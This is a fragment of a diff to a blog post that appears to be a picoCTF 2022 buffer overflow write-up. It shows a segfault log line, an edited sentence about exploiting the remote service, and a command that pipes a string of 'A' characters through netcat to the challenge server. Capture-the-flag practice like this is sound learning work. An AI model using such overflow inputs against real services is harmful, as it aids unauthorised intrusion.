zaneef/zaneef.github.io/_posts/2022-08-03-pico-ctf-2022-buffer-overflow-2022.md

 segfault at 0 ip 00007fc88e67c375 sp 00007ffec5897fd8 error 4 in libc-2.33.so[7fc88e52e000+158000]
 ```

-Let's exploit the service and get some points
+We can now exploit the remote service and get some points

 ```bash
 $ python -c 'print "A" * 20' | nc saturn.picoctf.net 65355